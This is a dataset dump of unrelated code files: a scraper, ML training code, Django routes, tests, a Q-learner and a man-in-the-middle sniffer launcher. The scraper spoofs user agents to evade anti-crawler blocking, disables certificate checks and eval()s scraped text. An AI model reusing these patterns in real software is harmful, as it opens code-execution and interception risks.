        "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
        "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
        "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    ]
    random_agent = USER_AGENTS[randint(0, len(USER_AGENTS) - 1)]
    headers = {
        'User-Agent': random_agent,
    }
    # Bug fix: initialize contents so that the function cannot raise
    # UnboundLocalError when all 10 attempts fail.
    contents = ''
    for j in range(10):
        try:
            res = requests.get(url, headers=headers,
                               verify=False, timeout=(5, 10))
            contents = res.text
        except Exception as e:
            if j >= 9:
                print('The exception has happened', '-' * 100)
            else:
                time.sleep(0.5)
        else:
            time.sleep(0.5)
            break
    return contents
def find_English_term(content: str):
    """
    Extract the English term from the page contents.

    :param content: The contents of the website
    :return term: The English term found between '["' and '"]' after '范畴号'
    :return tail: The contents starting just after the first '名称' marker
    """
    anchor = '范畴号'
    # Look only at a 100-character window after the anchor.
    window = content[content.find(anchor) + len(anchor):][:100]
    start = window.find('["') + 2
    term = window[start:window.find('"]')]
    # Drop everything up to and including the '名称' marker.
    tail = content[content.find('名称') + len('名称'):]
    return term, tail
def find_Chinese_term(content: str):
    """
    Extract the Chinese term from the page contents.

    :param content: The contents of the website
    :return term: The Chinese term ('' when no '中文名称' marker is present)
    :return tail: The contents after the '中文名称' marker (unchanged when absent)
    """
    marker = '中文名称'
    if marker not in content:
        return '', content
    start = content.find('["') + len('["')
    end = content.find(marker) - len('"],"n":"')
    term = content[start:end]
    return term, content[content.find(marker) + len(marker):]
def find_English_definition(content: str) -> tuple:
    """
    Extract the English definition from the page contents.

    :param content: The contents of the website
    :return definition: The definition ('' when no '释义' marker is present)
    :return tail: The contents after the '释义' marker (unchanged when absent)
    """
    if '释义' not in content:
        return '', content
    start = content.find('"f":"def","v"') + len('"f":"def","v":["')
    end = content.find('释义')
    definition = content[start:end - len('"],"n":"')]
    return definition, content[end + len('释义'):]
def synonym(content: str):
    """
    Extract the synonym words of the English term from the page contents.

    :param content: The contents of the website
    :return: The synonym words ('' when no '同义词' marker is present)
    """
    if '同义词' not in content:
        return ''
    tail = content[content.find('linkToBaTeleva') + len('linkToBaTeleva'):]
    start = tail.find('["') + len('[')
    end = tail.find('名称') - len('],"n":"')
    return tail[start:end]
def field(ID: str):
    """
    Fetch and normalize the 'Fields' fragment for a particular term.

    Retries up to 10 times on request failure.

    :param ID: The ID of a particular website (word)
    :return content: The cleaned Fields contents ('' if every request failed)
    """
    # URL of the Fields contents
    url = 'https://www.nstl.gov.cn/execute?target=nstl4.search4&function=stkos/pc/detail/ztree&id=C0200' + ID
    # A fake device to avoid the Anti reptile
    USER_AGENTS = [
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
        "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
        "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
        "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
        "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
        "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
        "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    ]
    random_agent = USER_AGENTS[randint(0, len(USER_AGENTS) - 1)]
    headers = {
        'User-Agent': random_agent,
    }
    # Bug fix: track the response explicitly; the original read res.text
    # after the loop and raised NameError when every attempt failed.
    res = None
    for j in range(10):
        try:
            res = requests.get(url, headers=headers,
                               verify=False, timeout=(5, 10))
        except Exception as e:
            if j >= 9:
                print('The exception has happened', '-' * 100)
            else:
                time.sleep(0.5)
        else:
            time.sleep(0.1)
            break
    if res is None:
        return ''
    content = res.text
    # Remove some useless contents from the Fields contents
    # e.g., "total":1,"code":0,
    #       ,"value":"180911","font":{"color":"#999"}}
    START = content.find('code') + len('code":0,')
    content = content[START:]
    content = content.replace(',"font":{"color":"#999"}', '')
    content = content.replace('"data"', '"Fields"')
    while '"value"' in content:
        mark = content.find('"value"')
        temp_cont = content[mark:mark + 100]
        end = temp_cont.find('"}')
        true_start = mark - 1
        true_end = mark + end + 1
        content = content.replace(content[true_start:true_end], '')
    return content
class MyEncoder(json.JSONEncoder):
    """JSON encoder that converts numpy scalars and arrays to Python natives."""

    def default(self, obj):
        # Map numpy types onto their built-in equivalents before encoding.
        if isinstance(obj, np.integer):
            return int(obj)
        if isinstance(obj, np.floating):
            return float(obj)
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        return super().default(obj)
def save_json(saved_data: list, save_name: str):
    '''
    Save the data into a pretty-printed UTF-8 JSON file.

    Uses `MyEncoder` so numpy scalars/arrays are converted to natives.

    :param saved_data: the dataset which should be saved
    :param save_name: the saved path of the JSON file
    :return: saved file
    '''
    # `with` guarantees the handle is closed even if json.dump raises;
    # the original open()/close() pair leaked the handle on error.
    with open(save_name, 'w', encoding='utf-8') as file:
        json.dump(saved_data, file, ensure_ascii=False, indent=4, cls=MyEncoder)
def run_code(start_index: int, end_index: int):
    """
    Scrape and save one JSON file per term ID in [start_index, end_index).

    :param start_index: The first (inclusive) numeric ID to fetch
    :param end_index: The last (exclusive) numeric ID to fetch
    """
    for index in range(start_index, end_index):
        # IDs are zero-padded to five digits (e.g. 42 -> '00042');
        # larger IDs are left unchanged, matching the original chain of ifs.
        i = str(index).zfill(5)
        # Get the contents of the website
        contents = read_url(ID=i)
        # If there is nothing in this website, then skip and continue
        if 'linkToCaClnotn' not in contents:
            print('There is no data in this webpage! Skip and continue......')
            continue
        # Find the English Term from the contents
        Eng_term, con_cut_eng = find_English_term(content=contents)
        # Find the Chinese Term from the contents
        Chi_term, con_cut_chi = find_Chinese_term(content=con_cut_eng)
        # Find the English Definition from the contents
        Eng_def, _ = find_English_definition(content=con_cut_chi)
        # Find the Synonym Words from the contents
        synonym_word = synonym(content=con_cut_chi)
        # Find the Fields from another contents
        field_names = field(ID=i)
        # Bug fix: build the JSON string from scratch on every iteration.
        # The original accumulated across iterations, so from the second
        # word onward eval() received '{...}{...}' and crashed.
        JSON_file = '{'
        JSON_file += '"English Term": ["'
        JSON_file += Eng_term
        JSON_file += '"], '
        JSON_file += '"Chinese Term": ["'
        JSON_file += Chi_term
        JSON_file += '"], '
        JSON_file += '"English Definition": ["'
        JSON_file += Eng_def
        JSON_file += '"], '
        JSON_file += '"Synonym Words": ['
        JSON_file += synonym_word
        JSON_file += '], '
        JSON_file += field_names
        # NOTE(security): eval() on scraped text is dangerous; json.loads
        # would be the safer parser here.
        save_json(eval(JSON_file), save_path + '%s_word.json' % i)
        print('The %s word JSON file has been successfully saved!' % i)
# The main function
if __name__ == '__main__':
    # The saved path for the JSON files (global, read by run_code)
    save_path = 'NSTD-data-2020/'
    if not os.path.exists(save_path):
        os.mkdir(save_path)
    # Partition the ID space into contiguous chunks, one worker thread each.
    bounds = [(29329, 33329), (33329, 37329), (37329, 41329),
              (41329, 45329), (45329, 49329), (49329, 53329),
              (53329, 54487)]
    tasks = [threading.Thread(target=run_code, args=b) for b in bounds]
    for task in tasks:
        task.start()
    # Wait for all workers; the process would stay alive for these
    # non-daemon threads anyway, joining just makes the shutdown explicit.
    for task in tasks:
        task.join()
| StarcoderdataPython |
9628415 | <gh_stars>0
# Read how much money the user carries and convert it to US dollars
# at a fixed exchange rate of R$ 3.27 per dollar.
amount_brl = float(input('Quanto em dinheiro você tem na carteira'))
amount_usd = amount_brl / 3.27
print(f'O valor que você tem na carteira corresponde a: {amount_usd:.2f} dolares')
6814 | <reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py
import pytest
from AutomationFramework.page_objects.interfaces.interfaces import Interfaces
from AutomationFramework.tests.base_test import BaseTest
class TestInterfacesSubInterfaces(BaseTest):
    # YAML file defining every sub-interface test case used by this class.
    test_case_file = 'if_subif.yml'
    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'if_subif_description',
                                                         'page_object_class': Interfaces}])
    def test_if_subif_description(self, create_page_object):
        """Apply the sub-interface description via edit-config and validate it."""
        create_page_object.execute_generic_interfaces_edit_config_test_case()
        assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'if_subif_enabled',
                                                         'page_object_class': Interfaces}])
    def test_if_subif_enabled(self, create_page_object):
        """Apply the sub-interface enabled flag via edit-config and validate it."""
        create_page_object.execute_generic_interfaces_edit_config_test_case()
        assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'if_subif_ip_prefix_length',
                                                         'page_object_class': Interfaces}])
    def test_if_subif_ip_prefix_length(self, create_page_object):
        """Apply the sub-interface IP prefix length via edit-config and validate it."""
        create_page_object.execute_generic_interfaces_edit_config_test_case()
        assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
    @pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
                                                                   'test_case_name': 'if_subif_ip_state',
                                                                   'page_object_rpcs_classes': [Interfaces, Interfaces],
                                                                   'rpc_clean_order': None,
                                                                   }])
    def test_if_subif_ip_state(self, multiple_create_page_objects):
        """Execute each RPC page object for the ip-state case and validate every reply."""
        for page_object in multiple_create_page_objects:
            page_object.execute_interface_rpc()
            assert page_object.validate_rpc(), page_object.get_test_case_description()
    @pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
                                                                   'test_case_name': 'if_subif_origin',
                                                                   'page_object_rpcs_classes': [Interfaces, Interfaces],
                                                                   'rpc_clean_order': None,
                                                                   }])
    def test_if_subif_origin(self, multiple_create_page_objects):
        """Execute each RPC page object for the origin case and validate every reply."""
        for page_object in multiple_create_page_objects:
            page_object.execute_interface_rpc()
            assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_dhcp_client',
'page_object_class': Interfaces}])
def test_if_subif_dhcp_client(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_mtu',
'page_object_class': Interfaces}])
def test_if_subif_mtu(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_inner_outer_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_inner_outer_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_match_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_match_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
| StarcoderdataPython |
6477315 | from math import gamma
import torch.nn as nn
import torch
import torch.optim as optim
from torchvision import datasets
from torchvision.transforms import ToTensor
from torch.utils.data import DataLoader, random_split
import time
import torch.optim.lr_scheduler as lr_s
import torchvision.transforms as transforms
from Block import Block
class CircResNet(nn.Module):
    """ResNet-style convolutional autoencoder for 32x32 RGB images.

    The encoder is a stem conv followed by three residual stages
    (16 -> 32 -> 64 channels, resolution 32 -> 16 -> 8); the decoder is a
    single linear layer mapping the 64*8*8 = 4096 features back to a
    3*32*32 = 3072 vector. Input dropout acts as denoising corruption.
    """
    def __init__(self):
        super(CircResNet, self).__init__()
        # Shared activation / regularisation modules.
        self.relu = nn.GELU()
        self.softmax = nn.Softmax(dim=1)
        self.dropout = nn.Dropout(p=0.5)
        # Stem: 3 -> 16 channels at full resolution.
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, stride=1,
                               kernel_size=3, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(16)
        # Three residual stages of five blocks each; the first block of
        # stages 2 and 3 downsamples (stride 2) while doubling channels.
        self.blockset1 = self._make_stage(16, 16, first_stride=1)
        self.blockset2 = self._make_stage(16, 32, first_stride=2)
        self.blockset3 = self._make_stage(32, 64, first_stride=2)
        # Decoder head: 64 * 8 * 8 -> 3 * 32 * 32.
        self.fc = nn.Linear(4096, 3072)
        self._init_weights()

    @staticmethod
    def _make_stage(in_ch, out_ch, first_stride):
        """Build five residual blocks; only the first may change shape."""
        blocks = [Block(in_ch, out_ch, stride=first_stride)]
        blocks.extend(Block(out_ch, out_ch, stride=1) for _ in range(4))
        return nn.Sequential(*blocks)

    def _init_weights(self):
        """Kaiming-initialise conv weights; unit-scale BatchNorm params."""
        for module in self.modules():
            if isinstance(module, Block):
                nn.init.kaiming_normal_(module.conv1.weight, mode='fan_out', nonlinearity='relu')
                nn.init.kaiming_normal_(module.conv2.weight, mode='fan_out', nonlinearity='relu')
                nn.init.constant_(module.bn1.weight, 1)
                nn.init.constant_(module.bn1.bias, 0)
                nn.init.constant_(module.bn2.weight, 1)
                nn.init.constant_(module.bn2.bias, 0)
            elif isinstance(module, nn.Conv2d):
                nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(module, nn.BatchNorm2d):
                nn.init.constant_(module.weight, 1)
                nn.init.constant_(module.bias, 0)

    def forward(self, x):
        # Corrupt the input during training (identity in eval mode).
        x = self.dropout(x)
        x = self.relu(self.bn1(self.conv1(x)))
        for stage in (self.blockset1, self.blockset2, self.blockset3):
            x = stage(x)
        # (N, 64, 8, 8) -> (N, 4096) -> (N, 3072)
        flat = x.reshape(x.shape[0], -1)
        return self.relu(self.fc(flat))
def run_model():
    """Train CircResNet as a CIFAR-10 autoencoder and save its weights.

    The loss is MSE between the network's 3072-dim output and the flattened
    input image (class labels are unused). Validation loss drives a simple
    early-stopping counter; weights are saved to 'circ-resnet.pickle'.
    """
    start_time = time.time()
    num_epochs = 10
    # Fall back to CPU so the script still runs without CUDA.
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    # CIFAR-10 train split, further divided into train/validation sets.
    training_data = datasets.CIFAR10(root="data", train=True, download=True, transform=ToTensor())
    training_data, validation_set = random_split(training_data, [45000, 5000])
    train_dataloader = DataLoader(training_data, batch_size=500, shuffle=True)
    valid_dataloader = DataLoader(validation_set, batch_size=500, shuffle=True)
    model = CircResNet().to(device)
    loss_f = nn.MSELoss()
    optimizer = optim.Adam(model.parameters(), lr=1e-2, weight_decay=1e-7)
    scheduler = lr_s.ExponentialLR(optimizer, gamma=0.9)
    old_loss = float('inf')
    times_worse = 0
    for epoch in range(num_epochs):
        print('Epoch: ', epoch)
        # Re-enable dropout after the previous epoch's eval().
        model.train()
        train_loss = 0.0
        for data, labels in train_dataloader:
            data = data.to(device=device)
            # Reconstruction target: the (uncorrupted) flattened input.
            target = data.reshape(data.shape[0], -1)
            scores = model(data)
            loss = loss_f(scores, target)
            train_loss += loss.item()  # .item() avoids retaining the autograd graph
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
        # --- validation: no gradients, dropout disabled ---
        model.eval()
        valid_loss = 0.0
        with torch.no_grad():
            for data, labels in valid_dataloader:
                data = data.to(device=device)
                # Bug fix: compare against this batch's flattened input,
                # not the last *training* batch's, and accumulate instead
                # of overwriting each iteration.
                target = data.reshape(data.shape[0], -1)
                valid_loss += loss_f(model(data), target).item() * data.size(0)
        scheduler.step()
        print('Validation Loss: ', valid_loss)
        times_worse = times_worse + 1 if valid_loss >= old_loss else 0
        if times_worse >= 3:
            # The ExponentialLR scheduler already decays the rate each epoch.
            print('Reducing learning rate.')
        if times_worse >= 6:
            print('Stopping early.')
            break
        old_loss = valid_loss
        print('\n')
    torch.save(model.state_dict(), 'circ-resnet.pickle')
    print('Saved to .pickle file')
    print('Finished in %s seconds' % round(time.time() - start_time, 1))
# Entry point: train and persist the model only when executed as a script.
# (Stray dataset-separator text fused onto the last line was removed; it
# made the file a syntax error.)
if __name__ == '__main__':
    run_model()
6644348 | <filename>run.py
import os
import sys
from baldrick import create_app
# Configure the app
app = create_app('astropy-bot')
# Load plugins from baldrick
import baldrick.plugins.github_milestones # noqa
# Load astropy-specific plugins (imported for their registration side effects)
import astropy_bot.changelog_checker # noqa
import astropy_bot.autolabel # noqa
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get('PORT', 5000))
# '--skip-run' lets the module be imported/initialised without starting
# the server (e.g. for tooling or tests).
if '--skip-run' not in sys.argv:
    app.run(host='0.0.0.0', port=port, debug=False)
| StarcoderdataPython |
285822 | from extended_rl.prerandom import agentrandom
class Q_learner:
    """
    Basic Q-learning agent, see https://en.wikipedia.org/wiki/Q-learning.

    Q-values live in a dict keyed by (observation, action) pairs.
    Randomness comes from the deterministic ``agentrandom`` stream,
    indexed by ``rand_counter`` so runs are reproducible.
    """
    def __init__(self, epsilon=0.9, learning_rate=0.1, gamma=0.9, **kwags):
        # epsilon is the probability of acting greedily: exploration happens
        # when agentrandom.random(...) > epsilon (see act()).
        self.epsilon = epsilon
        self.learning_rate = learning_rate
        self.gamma = gamma
        # NOTE(review): self.n_actions is not assigned anywhere in this class;
        # presumably a subclass or the framework sets it before __init__ runs
        # -- confirm against the extended_rl agent machinery.
        self.actions = range(self.n_actions)
        self.qtable = {}
        # Index into the pre-generated random stream; advanced in train().
        self.rand_counter = 0
    def act(self, obs):
        """Return an action for *obs* via epsilon-greedy selection."""
        qtable, epsilon, actions = self.qtable, self.epsilon, self.actions
        maybe_add_obs_to_qtable(qtable, actions, obs)
        if agentrandom.random(self.rand_counter) > epsilon:
            # Explore: uniformly random action.
            return agentrandom.randrange(self.n_actions, self.rand_counter+1)
        elif all(qtable[obs,a]==0 for a in actions):
            # No information for this observation yet: also act randomly.
            return agentrandom.randrange(self.n_actions, self.rand_counter+1)
        else:
            # Exploit: pick the action with the highest Q-value.
            return max(actions, key=lambda a: qtable[obs,a])
    def train(self, o_prev, a, r, o_next):
        """Standard Q-learning update for the transition (o_prev, a, r, o_next)."""
        qtable, actions, gamma = self.qtable, self.actions, self.gamma
        maybe_add_obs_to_qtable(qtable, actions, o_prev)
        maybe_add_obs_to_qtable(qtable, actions, o_next)
        qtarget = r + gamma * max([qtable[o_next,actn] for actn in actions])
        qpredict = qtable[o_prev, a]
        qtable[o_prev, a] += self.learning_rate * (qtarget - qpredict)
        # Skip past the (up to) two random indices act() may have consumed:
        # rand_counter and rand_counter+1.
        self.rand_counter += 2
def maybe_add_obs_to_qtable(qtable, actions, obs):
    """Ensure *obs* has a zero-initialised Q entry for every action.

    Membership is probed via the (obs, 0) key, so *actions* is assumed to
    contain 0 (the caller builds it with range()). Existing entries are
    never overwritten. (Also removed stray dataset-separator text that had
    been fused onto the last line.)
    """
    if (obs, 0) not in qtable:  # idiomatic 'not in' instead of not((...) in ...)
        qtable.update({(obs, a): 0 for a in actions})
4890910 | <filename>man_in_the_middle/sniffer.py
from src.mitm import get_args, sniffer
# Read the target network interface from the CLI arguments and start the
# MITM sniffer on it. (Stray dataset-separator text fused onto the last
# line was removed; it made the script a syntax error.)
interface = get_args()
sniffer(interface)
1801323 | from django.conf.urls import url
from products import views
# NOTE(review): many API routes below share name="beer_store_api", which makes
# reverse()/{% url %} lookups ambiguous (only the last registration wins).
# Renaming them would change runtime behavior for any caller reversing by
# name, so it is flagged here rather than changed. django.conf.urls.url is
# also deprecated in modern Django (use re_path) -- confirm project version.
urlpatterns = [
    url(
        regex=r"^on-sale/$",
        view=views.home,
        name="landing_page"
    ),
    url(
        regex=r"^$",
        view=views.ProductsListView.as_view(),
        name="deals_page"
    ),
    url(
        regex=r"^all-beers/$",
        view=views.ProductsListView.as_view(),
        name='product-list'
    ),
    # /stores
    url(
        regex=r"^stores/$",
        view=views.stores,
        name="api-stores"
    ),
    # /stores/{store_id}
    url(
        regex=r"^stores/(?P<store_id>[0-9]+)/$",
        view=views.store_by_id,
        name="api-stores-id"
    ),
    # /products
    url(
        regex=r"^products/$",
        view=views.products,
        name="api-products"
    ),
    # /beers
    url(
        regex=r"^beers/$",
        view=views.beers,
        name="api-beers"
    ),
    # /beers/{beer_id}
    url(
        regex=r"^beers/(?P<beer_id>[0-9]+)/$",
        view=views.beer_by_id,
        name="beer_store_api"
    ),
    # /beer_prices/{beer_id}
    url(
        regex=r"^beer_prices/(?P<beer_id>[0-9]+)/$",
        view=views.beer_prices_by_id,
        name="beer_store_api"
    ),
    # /beers/{beer_id}/products
    url(
        regex=r"^beers/(?P<beer_id>[0-9]+)/products/$",
        view=views.beer_products,
        name="beer_store_api"
    ),
    # /products/{product_id}
    url(
        regex=r"^products/(?P<product_id>[0-9]+)/$",
        view=views.product_by_id,
        name="beer_store_api"
    ),
    # /product_prices/{product_id}
    url(
        regex=r"^product_prices/(?P<product_id>[0-9]+)/$",
        view=views.product_prices_by_id,
        name="beer_store_api"
    ),
    # /stores/{store_id}/products
    url(
        regex=r"^stores/(?P<store_id>[0-9]+)/products/$",
        view=views.products_at_store,
        name="beer_store_api"
    ),
    # /products/{product_id}/stores
    url(
        regex=r"^products/(?P<product_id>[0-9]+)/stores/$",
        view=views.stores_with_product,
        name="beer_store_api"
    ),
    # Free-text beer search; trailing slash optional.
    url(r'^search/?$', view=views.search, name='beer_search'),
]
| StarcoderdataPython |
3400643 | <filename>web/app/syzygy/subscriptions/model.py
"""/web/app/syzygy/subscriptions/model.py
Author: <NAME> (<EMAIL>)
[Description]
Classes:
[ClassesList]
Functions:
[FunctionsList]
"""
import logging
from app import db
log = logging.getLogger(__name__)
class Subscription(db.Model):
    """A user's subscription row: tier, recurrence flag and expiry time.

    Maps to the ``subscriptions`` table.
    """
    __tablename__ = "subscriptions"
    id = db.Column(db.Integer, primary_key=True)
    # NOTE(review): userid has no ForeignKey and the relationship() call below
    # has no target -- SQLAlchemy will raise at mapper-configuration time.
    # Likely intended:
    #     userid = db.Column(db.Integer, db.ForeignKey("users.id"))
    #     user = db.relationship("User")
    # Confirm against the User model before changing.
    userid = db.Column(db.Integer)
    user = db.relationship()
    tier = db.Column(db.Integer)
    recurring = db.Column(db.Boolean)
    subscription_ends = db.Column(db.DateTime)
    def __init__(self, **kwargs):
        # Plain pass-through to the SQLAlchemy declarative constructor.
        super(Subscription, self).__init__(**kwargs)
    def update(self, changes: dict):
        """Apply *changes* as attribute assignments and return self (fluent)."""
        for key, val in changes.items():
            setattr(self, key, val)
        return self
| StarcoderdataPython |
6654630 | <gh_stars>1-10
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import datetime
import logging
import simplejson as json
from time import sleep
from nose.tools import nottest
from onlinelinguisticdatabase.tests import TestController, url
import onlinelinguisticdatabase.model as model
from onlinelinguisticdatabase.model.meta import Session
import onlinelinguisticdatabase.lib.helpers as h
from onlinelinguisticdatabase.model import Source
from onlinelinguisticdatabase.lib.bibtex import entry_types
from onlinelinguisticdatabase.lib.SQLAQueryBuilder import SQLAQueryBuilder
log = logging.getLogger(__name__)
################################################################################
# Functions for creating & retrieving test data
################################################################################
# Reference timestamps for fixtures: sources with i > 8 get yesterday's
# datetime_modified so date-based searches have both old and new rows.
today_timestamp = datetime.datetime.now()
day_delta = datetime.timedelta(1)
yesterday_timestamp = today_timestamp - day_delta
def _create_test_models(n=100):
    """Create and commit *n* File model fixtures (named 'name 1' .. 'name n')."""
    _add_test_models_to_session('File', n, ['name'])
    Session.commit()
def _add_test_models_to_session(model_name, n, attrs):
    """Add *n* instances of the named model to the session (no commit).

    Each attribute in *attrs* is set to u'<attr> <i>' for i in 1..n.
    """
    model_cls = getattr(model, model_name)
    for index in range(1, n + 1):
        instance = model_cls()
        for attr in attrs:
            setattr(instance, attr, u'%s %s' % (attr, index))
        Session.add(instance)
def _get_test_models():
    """Return the fixture models currently in the database, keyed by plural name."""
    return {'files': h.get_files()}
def _create_test_sources(n=100):
    """Create n sources with various properties. A testing ground for searches!

    Sources are bucketed by index i into BibTeX entry types:
    1-10 article, 11-20 book, 21-30 booklet, 31-40 conference, 41-50 inbook,
    51-60 incollection, 61-70 inproceedings, 71-80 manual, 81-90
    mastersthesis, 91+ misc. Even-numbered sources get an associated File;
    i > 8 get yesterday's datetime_modified. (Python 2 code: note the
    u'' literals and unicode() builtin.)
    """
    files = _get_test_models()['files']
    for i in range(1, n + 1):
        s = model.Source()
        s.key = unicode(i)
        if i in range(1, 11):
            s.type = u'article'
            s.author = u'Author Mc%d' % i
            s.title = u'Title %d' % i
            s.journal = u'Journal %d' % i
            # Year is 1990-1999 based on the index's last digit.
            s.year = int('199%s' % str(i)[-1])
        elif i in range(11, 21):
            s.type = u'book'
            s.author = u'Author Mc%d' % i
            s.title = u'Title %d' % i
            # NOTE(review): the publisher string is stored on .journal here;
            # looks like it should be s.publisher -- confirm against the
            # Source model / BibTeX validation before changing fixtures.
            s.journal = u'Publisher %d' % i
            s.year = int('199%s' % str(i)[-1])
        elif i in range(21, 31):
            s.type = u'booklet'
            s.title = u'Title %d' % i
        elif i in range(31, 41):
            s.type = u'conference'
            s.author = u'Author Mc%d' % i
            s.title = u'Title %d' % i
            s.booktitle = u'Book Title %d' % i
            s.year = int('199%s' % str(i)[-1])
        elif i in range(41, 51):
            s.type = u'inbook'
            s.editor = u'Editor Mc%d' % i
            s.title = u'Title %d' % i
            s.chapter = unicode(i)
            s.pages = u'9--36'
            s.publisher = u'Publisher %d' % i
            s.year = int('199%s' % str(i)[-1])
        elif i in range(51, 61):
            s.type = u'incollection'
            s.author = u'Author Mc%d' % i
            s.title = u'Title %d' % i
            s.booktitle = u'Book Title %d' % i
            s.publisher = u'Publisher %d' % i
            s.year = int('199%s' % str(i)[-1])
        elif i in range(61, 71):
            s.type = u'inproceedings'
            s.author = u'Author Mc%d' % i
            s.title = u'Title %d' % i
            s.booktitle = u'Book Title %d' % i
            s.year = int('199%s' % str(i)[-1])
        elif i in range(71, 81):
            s.type = u'manual'
            s.title = u'Title %d' % i
        elif i in range(81, 91):
            s.type = u'mastersthesis'
            s.author = u'Author Mc%d' % i
            s.title = u'Title %d' % i
            s.school = u'The University of %d' % i
            s.year = int('199%s' % str(i)[-1])
        else:
